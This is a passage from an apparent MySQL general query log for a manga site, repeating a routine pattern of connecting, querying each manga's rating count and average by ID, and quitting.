where manga_id = '87' order by created desc 330653471 Quit 330653472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330653472 Quit 330653473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330653473 Quit 330653474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330653474 Quit 330653475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330653475 Quit 330653476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330653476 Quit 330653477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330653477 Quit 330653478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330653478 Quit 330653479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330653479 Quit 330653480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330653480 Quit 330653481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330653481 Quit 330653482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330653482 Quit 330653483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330653483 Quit 330653484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330653484 Quit 330653485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330653485 Quit 330653486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330653486 Quit 330653487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330653487 Quit 330653488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330653488 Quit 330653489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330653489 Quit 330653490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330653490 Quit 330653491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330653491 Quit 330653492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330653492 Quit 330653493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330653493 Quit 330653494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330653494 Quit 330653495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330653495 Quit 330653496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330653496 Quit 330653497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330653497 Quit 330653498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330653498 Quit 330653499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330653499 Quit 330653500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330653500 Quit 330653501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330653501 Quit 330653502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330653502 Quit 330653503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330653503 Quit 330653504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330653504 Quit 330653505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330653505 Quit 330653506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330653506 Quit 330653507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330653507 Quit 330653508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330653508 Quit 330653509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330653509 Quit 330653510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330653510 Quit 330653511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330653511 Quit 330653512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330653512 Quit 330653513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330653513 Quit 330653514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330653514 Quit 330653515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330653515 Quit 330653516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330653516 Quit 330653517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330653517 Quit 330653518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330653518 Quit 330653519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330653519 Quit 330653520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330653520 Quit 330653521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330653521 Quit 330653522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330653522 Quit 330653523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330653523 Quit 330653524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330653524 Quit 330653525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330653525 Quit 330653526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330653526 Quit 330653527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330653527 Quit 330653528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330653528 Quit 330653529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330653529 Quit 330653530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330653530 Quit 330653531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330653531 Quit 330653532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330653532 Quit 330653533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330653533 Quit 330653534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330653534 Quit 330653535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330653535 Quit 330653536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330653536 Quit 330653537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330653537 Quit 330653538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330653538 Quit 330653539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330653539 Quit 330653540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330653540 Quit 330653541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330653541 Quit 330653542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330653542 Quit 330653543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330653543 Quit 330653544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330653544 Quit 330653545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330653545 Quit 330653546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330653546 Quit 330653547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330653547 Quit 330653548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330653548 Quit 330653549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330653549 Quit 330653550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330653550 Quit 330653551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330653551 Quit 330653552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330653552 Quit 330653553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330653553 Quit 330653554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330653554 Quit 330653555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330653555 Quit 330653556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330653556 Quit 330653557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330653557 Quit 330653558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330653558 Quit 330653559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330653559 Quit 330653560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330653560 Quit 330653561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330653561 Quit 330653562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330653562 Quit 330653563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330653563 Quit 330653564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330653564 Quit 330653565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330653565 Quit 330653566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330653566 Quit 330653567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330653567 Quit 330653568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330653568 Quit 330653569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330653569 Quit 330653570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330653570 Quit 330653571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330653571 Quit 330653572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330653572 Quit 330653573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330653573 Quit 330653574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330653574 Quit 330653575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330653575 Quit 330653576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330653576 Quit 330653577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330653577 Quit 330653578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330653578 Quit 330653579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330653579 Quit 330653580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330653580 Quit 330653581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330653581 Quit 330653582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330653582 Quit 330653583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330653583 Quit 330653584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330653584 Quit 330653585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330653585 Quit 330653586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330653586 Quit 330653587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330653587 Quit 330653588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330653588 Quit 330653589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330653589 Quit 330653590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330653590 Quit 330653591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330653591 Quit 330653592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330653592 Quit 330653593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330653593 Quit 330653594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330653594 Quit 330653595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330653595 Quit 330653596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330653596 Quit 330653597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330653597 Quit 330653598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330653598 Quit 330653599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330653599 Quit 330653600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330653600 Quit 330653601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330653601 Quit 330653602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330653602 Quit 330653603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330653603 Quit 330653604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330653604 Quit 330653605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330653605 Quit 330653606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330653606 Quit 330653607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330653607 Quit 330653608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330653608 Quit 330653609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330653609 Quit 330653610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330653610 Quit 330653611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330653611 Quit 330653612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330653612 Quit 330653613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330653613 Quit 330653614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330653614 Quit 330653615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330653615 Quit 330653616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330653616 Quit 330653617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330653617 Quit 330653618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330653618 Quit 330653619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330653619 Quit 330653620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330653620 Quit 330653621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330653621 Quit 330653622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330653622 Quit 330653623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330653623 Quit 330653624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id 